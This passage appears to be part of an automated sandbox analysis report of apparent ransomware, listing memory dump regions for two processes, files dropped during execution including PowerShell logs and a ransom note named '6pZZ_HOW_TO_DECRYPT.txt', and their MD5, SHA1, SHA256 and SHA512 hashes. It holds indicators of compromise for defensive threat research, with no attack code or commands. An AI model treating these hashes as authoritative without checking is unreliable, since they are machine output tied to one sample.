memory/1300-216-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-217-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/3012-219-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-220-0x0000017060360000-0x0000017060362000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/3012-221-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-222-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-223-0x0000017061EA0000-0x0000017061EC2000-memory.dmp
memory/3012-224-0x0000017060360000-0x0000017060362000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bc6200917c0308e385cd88c76934093 |
| SHA1 | 1e56f98f0d3d04ea9c1e081dead1522a3df2c313 |
| SHA256 | f278ab319ab9ab8eeb795ef8f47ad3230c3fc93ce380cdaca630d2a5319e8676 |
| SHA512 | a7ef6fcfea8cdbf368f66cff76b7ebe2698d68702ccca6133a92ffbd9debc7f04787f6291a74a3662a02738d362ddcbf407c716e61d6b5cc07fcc3cbcbdc3094 |
memory/3012-226-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-227-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-228-0x000001707AEE0000-0x000001707AF56000-memory.dmp
memory/3012-230-0x0000017061EF0000-0x0000017061EF2000-memory.dmp
memory/1300-229-0x00000269DEA58000-0x00000269DEA59000-memory.dmp
memory/3012-231-0x0000017061EF3000-0x0000017061EF5000-memory.dmp
memory/3012-232-0x0000017060360000-0x0000017060362000-memory.dmp
memory/3012-258-0x0000017061EF6000-0x0000017061EF8000-memory.dmp
memory/3012-259-0x0000017061EF8000-0x0000017061EF9000-memory.dmp
C:\6pZZ_HOW_TO_DECRYPT.txt
| MD5 | 1cfb0c836a5680f52b2d16a8ae40022e |
| SHA1 | da36a74002f1290477adfda81ff811c60707532a |
| SHA256 | 7fd073b91d1b56983dc0ef3937f75e7494840ae5d37027a76cfd04b04178e941 |
| SHA512 | efc87468cb3bff82d8f505c376a393a7b9c1abc517d771deae2855de9ead458fc37ca4bbfaed0f0b2840bba25ae3cd3d805f0bee464c64b774aa37ce913a4434 |